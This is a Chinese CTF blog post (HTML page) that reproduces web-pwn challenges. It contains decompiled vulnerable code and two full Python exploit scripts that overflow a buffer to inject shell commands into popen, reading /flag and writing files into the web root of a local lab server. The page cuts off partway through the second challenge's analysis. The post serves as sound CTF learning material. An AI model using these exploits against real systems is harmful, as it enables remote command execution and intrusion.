<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="webpwn初探">
<meta property="og:type" content="article">
<meta property="og:title" content="webpwn初探">
<meta property="og:url" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/index.html">
<meta property="og:site_name" content="ABf1ag&#39;s blog">
<meta property="og:description" content="webpwn初探">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108111637961.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108112409522.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108112446637.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108112932471.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108113108046.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108121954428.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108123226353.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108115456348.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108124437931.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108125007789.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220112185138828.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220112185443327.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220112191241152.png">
<meta property="og:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220112191729899.png">
<meta property="article:published_time" content="2022-01-12T10:23:08.000Z">
<meta property="article:modified_time" content="2022-07-10T04:49:15.592Z">
<meta property="article:author" content="ABf1ag">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108111637961.png">

<link rel="canonical" href="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>webpwn初探 | ABf1ag's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ABf1ag's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section">Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section">Archives</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section">links</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ABf1ag">
      <meta itemprop="description" content="CTF to learn,not learn to CTF">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ABf1ag's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          webpwn初探
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-01-12 18:23:08" itemprop="dateCreated datePublished" datetime="2022-01-12T18:23:08+08:00">2022-01-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2022-07-10 12:49:15" itemprop="dateModified" datetime="2022-07-10T12:49:15+08:00">2022-07-10</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="webpwn初探"><a href="#webpwn初探" class="headerlink" title="webpwn初探"></a>webpwn初探</h3><span id="more"></span>

<h3 id="1、安洵final"><a href="#1、安洵final" class="headerlink" title="1、安洵final"></a>1、安洵final</h3><p>安洵杯线下赛的最后一题，webpwn当时没做出来，看了两三天+darry的帮助下才复现出来。</p>
<p>做这类题目需要认认真真的去分析，才能找到漏洞点，但认真分析就会很浪费时间，说到底还是太菜。</p>
<p>首先要做的就是如何正确的输入，从下面三张图片即可看出需要我们输入请求方式、文件名、任意</p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108111637961.png" alt="image-20220108111637961"></p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108112409522.png" alt="image-20220108112409522"></p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108112446637.png" alt="image-20220108112446637"></p>
<p>下面这段代码自定义了一个头部X-Forword-For ，其后内容长度必须大于七，且必须是192.168.1.1~20</p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108112932471.png" alt="image-20220108112932471"></p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108113108046.png" alt="image-20220108113108046"></p>
<p>输入问题解决后，就得寻找漏洞了，一般的漏洞是目录穿越或者栈溢出。</p>
<p>从data段中找到了<code>login.cgi</code>、<code>logout.cgi</code>、<code>wifictl.cgi</code>、<code>logctl.cgi</code>，这些是文件名，并且每个文件名对应一个函数。</p>
<p>下图是以’=‘，’？‘，’&amp;‘三个符号将文件名分解</p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108121954428.png" alt="image-20220108121954428"></p>
<p><code>sub_4034FD</code>函数如下，a2是我们的输入，可以输入任意长度，并且复制给<code>dest1[16 * i + 40]</code></p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108123226353.png" alt="image-20220108123226353"></p>
<p>下图可以得出’？‘后应该跟ring_token</p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108115456348.png" alt="image-20220108115456348"></p>
<p>我们先看看wifictl这个函数，这个函数会给我们显示时间</p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108124437931.png" alt="image-20220108124437931"></p>
<p>漏洞点在logctl这个函数里，首先需要有一个token值，值是wifictl给出的时间。</p>
<p><img src="/2022/01/12/webpwn%E5%88%9D%E6%8E%A2/image-20220108125007789.png" alt="image-20220108125007789"></p>
<p>在<code>sub_402E56</code>中，a2是我们的输入，任意长度，s接受输入的值，因此有溢出，我们就可以控制a3了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall sub_402E56(__int64 a1, const char *a2, char *a3)</span><br><span class="line">&#123;</span><br><span class="line">  int v3; // eax</span><br><span class="line">  unsigned int v6; // [rsp+20h] [rbp-CE0h]</span><br><span class="line">  int i; // [rsp+24h] [rbp-CDCh]</span><br><span class="line">  int k; // [rsp+24h] [rbp-CDCh]</span><br><span class="line">  int j; // [rsp+28h] [rbp-CD8h]</span><br><span class="line">  int v10; // [rsp+2Ch] [rbp-CD4h]</span><br><span class="line">  int v11[128]; // [rsp+30h] [rbp-CD0h] BYREF</span><br><span class="line">  char v12[128]; // [rsp+230h] [rbp-AD0h] BYREF</span><br><span class="line">  char s[1312]; // [rsp+2B0h] [rbp-A50h] BYREF</span><br><span class="line">  char v14[1304]; // [rsp+7D0h] [rbp-530h] BYREF</span><br><span class="line">  unsigned __int64 v15; // [rsp+CE8h] [rbp-18h]</span><br><span class="line"></span><br><span class="line">  v15 = __readfsqword(0x28u);</span><br><span class="line">  v6 = 0;</span><br><span class="line">  v10 = 0;</span><br><span class="line">  if ( a2 )</span><br><span class="line">  &#123;</span><br><span class="line">    memset(s, 0, 0x514uLL);</span><br><span class="line">    memset(v14, 0, sizeof(v14));</span><br><span class="line">    memset(v12, 0, sizeof(v12));</span><br><span class="line">    memset(v11, 0, sizeof(v11));</span><br><span class="line">    strcpy(v12, &quot;$;`&#x27;&amp;|&lt;&gt;^\n\r&quot;);</span><br><span class="line">    strcpy(s, a2);</span><br><span class="line">    for ( i = 0; i &lt; strlen(s); ++i )</span><br><span class="line">    &#123;</span><br><span class="line">      for ( j = 0; j &lt; strlen(v12); ++j )</span><br><span class="line">      &#123;</span><br><span class="line">        if ( s[i] == v12[j] )</span><br><span class="line">        &#123;</span><br><span class="line">          v11[i] = 1;                           // v11[i]表示有和上面相同的符号</span><br><span class="line">          break;</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    for ( k = 0; k &lt; strlen(v12); ++k )</span><br><span class="line">    &#123;</span><br><span class="line">      if ( v11[k] == 1 )</span><br><span class="line">      &#123;</span><br><span class="line">        v3 = v10++;</span><br><span class="line">        v14[v3] = v12[k];</span><br><span class="line">        v6 = 1;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    strcpy(a3, v14);</span><br><span class="line">  &#125;</span><br><span class="line">  return v6;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>v5被我们控制后，popen函数会调用execve函数执行参数，因此我们就可以直接写/bin/sh了。</p>
<p>在使用pwntool模块时，我们需要注意下在写参数时需要进行url编码，所以得将空格换成%20或+。使用request模块则不需要。</p>
<p>完整exp：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">import requests</span><br><span class="line">io=remote(&#x27;127.0.0.1&#x27;,&#x27;10000&#x27;)</span><br><span class="line">context.log_level=&#x27;debug&#x27;</span><br><span class="line">payload = &#x27;GET /wifictl.cgi?ring_token=1 HTTP/1/1\r\nX-Forword-For: 192.168.1.1\r\n&#x27;</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recvuntil(&#x27;now time is &#x27;)</span><br><span class="line">time=io.recvuntil(&#x27;.&#x27;)[:-1]</span><br><span class="line">print(time)</span><br><span class="line">io.close()</span><br><span class="line"></span><br><span class="line">io=remote(&#x27;127.0.0.1&#x27;,&#x27;10000&#x27;)</span><br><span class="line">context.log_level=&#x27;debug&#x27;</span><br><span class="line">#cmd = &#x27;a;&#x27;+&#x27;a&#x27;*1311+&quot;/bin/cat /flag &gt; a;&quot;</span><br><span class="line">cmd = &#x27;a;&#x27;+&#x27;a&#x27;*1311+&#x27;/bin/ls+/+&gt;+/var/www/html/a;&#x27;</span><br><span class="line">payload = &#x27;GET /logctl.cgi?ring_token=&#123;0&#125;&amp;aa=&#123;1&#125; HTTP/1/1\r\nX-Forword-For: 192.168.1.1\r\n&#x27;.format(int(time)+1,cmd)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recvline()</span><br><span class="line">io.close()</span><br><span class="line"></span><br><span class="line">io=remote(&#x27;127.0.0.1&#x27;,10000)</span><br><span class="line">context.log_level=&#x27;debug&#x27;</span><br><span class="line">payload = &#x27;GET /a HTTP/1/1\r\nX-Forword-For: 192.168.1.1\r\n&#x27;</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recvline()</span><br><span class="line">io.close()</span><br><span class="line">#io.interactive()</span><br></pre></td></tr></table></figure>

<p>request模块</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"># import getopt</span><br><span class="line"># import sys</span><br><span class="line">import warnings</span><br><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line"># import json</span><br><span class="line">import socket</span><br><span class="line">import socks</span><br><span class="line">#socks.setdefaultproxy(socks.HTTP, &quot;127.0.0.1&quot;, 8080)</span><br><span class="line">#socket.socket = socks.socksocket</span><br><span class="line">#context.log_levle=&#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">def exp(url):</span><br><span class="line">    if url[len(url) - 1] != &#x27;/&#x27;:</span><br><span class="line">        print(&quot;[-] Target URL Format Error,The last char in url must be &#x27;/&#x27;.&quot;)</span><br><span class="line">        return False</span><br><span class="line">    </span><br><span class="line">    warnings.filterwarnings(&#x27;ignore&#x27;)</span><br><span class="line">    s = requests.session()</span><br><span class="line">    s.verify = False</span><br><span class="line">    header = &#123;</span><br><span class="line">        &#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&#x27;,</span><br><span class="line">        &#x27;X-Forword-For&#x27;: &#x27;192.168.1.1&#x27;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    try:</span><br><span class="line">        # print(&quot;[+] login...&quot;)</span><br><span class="line">        ret = s.get(&quot;&#123;&#125;wifictl.cgi?ring_token=1&quot;.format(url), headers=header, timeout=8)</span><br><span class="line">	print(s)        </span><br><span class="line">	if ret.status_code == 200:</span><br><span class="line">            if &quot;now time is&quot; in ret.content.decode():</span><br><span class="line">                time_ret = re.search(r&quot;now time is (.+?)\.\n&quot;,ret.content.decode())</span><br><span class="line">                if time_ret is None:</span><br><span class="line">                    print(&quot;[-] time_ret re error, cannot get time&quot;)</span><br><span class="line">                    return False</span><br><span class="line">                else:</span><br><span class="line">                    now_time = time_ret.group(1)</span><br><span class="line">                    print(&quot;[+] now time is &quot; + now_time)</span><br><span class="line">            else:</span><br><span class="line">                print(&quot;[-] time_ret re error, cannot get time&quot;)</span><br><span class="line">                return False</span><br><span class="line">        else:</span><br><span class="line">            print(&quot;[-] status_code error, cannot get time&quot;)</span><br><span class="line">            return False</span><br><span class="line">        </span><br><span class="line">        cmd = &quot;a;&quot; + &quot;a&quot;*1311 + &quot;/bin/cat /flag &gt;/var/www/html/flag;&quot;</span><br><span class="line">        new_url = &quot;&#123;&#125;logctl.cgi?ring_token=&#123;&#125;&amp;aa=&#123;&#125;&quot;.format(url, int(now_time)+1, cmd)</span><br><span class="line">        ret = s.get(new_url, headers=header, timeout=8)</span><br><span class="line">	</span><br><span class="line">        # if ret.status_code == 200:</span><br><span class="line">        #     print(ret.content.decode())</span><br><span class="line">        # else:</span><br><span class="line">        #     print(&quot;[-] status_code error, cannot get flag&quot;)</span><br><span class="line">        #     return False</span><br><span class="line">        ret = s.get(&quot;&#123;&#125;flag&quot;.format(url), headers=header, timeout=8)</span><br><span class="line">        if ret.status_code == 200:</span><br><span class="line">            print(ret.content.decode())</span><br><span class="line">        else:</span><br><span class="line">            print(&quot;[-] status_code error, cannot get flag&quot;)</span><br><span class="line">            return False</span><br><span class="line">        </span><br><span class="line">        cmd = &quot;a;&quot; + &quot;a&quot;*1311 + &quot;rm /var/www/html/flag;&quot;</span><br><span class="line">        new_url = &quot;&#123;&#125;logctl.cgi?ring_token=&#123;&#125;:1&amp;aa=&#123;&#125;&quot;.format(url, int(now_time)+1, cmd)</span><br><span class="line">        ret = s.get(new_url, headers=header, timeout=8)</span><br><span class="line">        if ret.status_code == 200:</span><br><span class="line">            return True</span><br><span class="line">        else:</span><br><span class="line">            print(&quot;[-] status_code error, cannot rm flag&quot;)</span><br><span class="line">            return False</span><br><span class="line">    </span><br><span class="line">    except Exception as reason:</span><br><span class="line">        if &#x27;timed&#x27; in repr(reason) or &#x27;timeout&#x27; in repr(reason):</span><br><span class="line">            print(&#x27;[-] Fail, can not connect target for: timeout&#x27;)</span><br><span class="line">            return False</span><br><span class="line">        else:</span><br><span class="line">            print(&#x27;[-] Fail, can not connect target for: &#123;&#125;&#x27;.format(repr(reason)))</span><br><span class="line">            return False</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">exp(&quot;http://127.0.0.1:10000/&quot;)</span><br></pre></td></tr></table></figure>

<h3 id="2、ciscn2021final-Message-Board"><a href="#2、ciscn2021final-Message-Board" class="headerlink" title="2、ciscn2021final Message_Board"></a>2、ciscn2021final Message_Board</h3><p>当时总决赛这个题没有抽到，现在正好复现复现。不得不说，企鹅师傅出的真好。</p>
<p>先是规范我们的输入，以<code>\r\n</code>为分隔符将输入分组，第一组再以‘空格分组，第一组的三个部分分别是请求方式（GET、POST）、文件路径（/submit、/messages、/register）、协议（HTTP/1.1、HTTP/1.0）。紧接着要求第二组头部是<code>Content-Length： </code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br></pre></td><td class="code"><pre><span class="line">int __cdecl main()</span><br><span class="line">&#123;</span><br><span class="line">  char s[32]; // [esp+4h] [ebp-474h] BYREF</span><br><span class="line">  char v2[512]; // [esp+24h] [ebp-454h] BYREF</span><br><span class="line">  char v3[512]; // [esp+224h] [ebp-254h] BYREF</span><br><span class="line">  char v4[32]; // [esp+424h] [ebp-54h] BYREF</span><br><span class="line">  char *v5; // [esp+444h] [ebp-34h]</span><br><span class="line">  char *v6; // [esp+44Ch] [ebp-2Ch]</span><br><span class="line">  char *v7; // [esp+450h] [ebp-28h]</span><br><span class="line">  char *dest; // [esp+454h] [ebp-24h]</span><br><span class="line">  char *v9; // [esp+458h] [ebp-20h]</span><br><span class="line">  char *v10; // [esp+45Ch] [ebp-1Ch]</span><br><span class="line">  char *src; // [esp+460h] [ebp-18h]</span><br><span class="line">  size_t v12; // [esp+464h] [ebp-14h]</span><br><span class="line">  int i; // [esp+468h] [ebp-10h]</span><br><span class="line">  char *v14; // [esp+46Ch] [ebp-Ch]</span><br><span class="line"></span><br><span class="line">  init();</span><br><span class="line">  memset(s, 0, 1096u);</span><br><span class="line">  v12 = sub_8048950(stdin, dest1, 1024);        // 返回第一段\r\n（包含）的长度，且将赋值到dest1</span><br><span class="line">  src = dest1;</span><br><span class="line">  v10 = strchr(dest1, &#x27; &#x27;);</span><br><span class="line">  if ( !v10 || v10 - src &gt; 31 || v10 == src )</span><br><span class="line">  &#123;</span><br><span class="line">    sub_8048A43(stdout);</span><br><span class="line">    exit(-1);</span><br><span class="line">  &#125;</span><br><span class="line">  strncpy(s, src, v10 - src);</span><br><span class="line">  src = ++v10;                                  // 第一个空格之后</span><br><span class="line">  v10 = strchr(v10, &#x27; &#x27;);                       // 第二个空格前</span><br><span class="line">  if ( !v10 || v10 - src &gt; 0x1FF || v10 == src )</span><br><span class="line">  &#123;</span><br><span class="line">    sub_8048A43(stdout);</span><br><span class="line">    exit(-1);</span><br><span class="line">  &#125;</span><br><span class="line">  v9 = strchr(src, &#x27;?&#x27;);</span><br><span class="line">  if ( v9 &amp;&amp; v9 &lt; v10 )</span><br><span class="line">  &#123;</span><br><span class="line">    strncpy(v2, src, v9 - src);                 // v2 文件名到？</span><br><span class="line">    strncpy(v3, v9 + 1, v10 - v9 - 1);          // ？后第二个空格前</span><br><span class="line">  &#125;</span><br><span class="line">  else</span><br><span class="line">  &#123;</span><br><span class="line">    strncpy(v2, src, v10 - src);</span><br><span class="line">  &#125;</span><br><span class="line">  src = ++v10;</span><br><span class="line">  v10 = strstr(v10, &quot;\r\n&quot;);                    // 第二个空格后到\r\n前</span><br><span class="line">  if ( v10 &amp;&amp; v10 - src &lt;= 31 )</span><br><span class="line">    strncpy(v4, src, v10 - src);</span><br><span class="line">  if ( v4[0] &amp;&amp; strcmp(v4, &quot;HTTP/1.1&quot;) &amp;&amp; strcmp(v4, &quot;HTTP/1.0&quot;) )</span><br><span class="line">  &#123;</span><br><span class="line">    sub_8048A89(stdout);</span><br><span class="line">    exit(-1);</span><br><span class="line">  &#125;</span><br><span class="line">  v5 = 0;</span><br><span class="line">  v14 = 0;</span><br><span class="line">  dest = (char *)calloc(0x41u, 1u);</span><br><span class="line">  v7 = (char *)calloc(0x201u, 1u);</span><br><span class="line">  for ( i = 0; ; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    if ( i &gt; 31 )</span><br><span class="line">    &#123;</span><br><span class="line">      sub_8048A43(stdout);</span><br><span class="line">      exit(-1);</span><br><span class="line">    &#125;</span><br><span class="line">    v12 = sub_8048950(stdin, dest1, 1024);</span><br><span class="line">    src = dest1;</span><br><span class="line">    v10 = dest1;</span><br><span class="line">    if ( !strncmp(dest1, &quot;\r\n&quot;, 2u) )</span><br><span class="line">      break;</span><br><span class="line">    v10 = strchr(src, &#x27;:&#x27;);</span><br><span class="line">    if ( !v10 || v10 - src &gt; 63 || v10 == src )</span><br><span class="line">    &#123;</span><br><span class="line">      sub_8048A43(stdout);</span><br><span class="line">      exit(-1);</span><br><span class="line">    &#125;</span><br><span class="line">    *v10 = 0;</span><br><span class="line">    strncpy(dest, src, 0x40u);                  // dest 头部</span><br><span class="line">    src = v10 + 1;                              // 头部 ： 后的内容包含空格</span><br><span class="line">    v10 = strstr(v10 + 1, &quot;\r\n&quot;);</span><br><span class="line">    if ( !v10 || v10 - src &gt; 0x1FF || src + 1 &gt;= v10 )</span><br><span class="line">    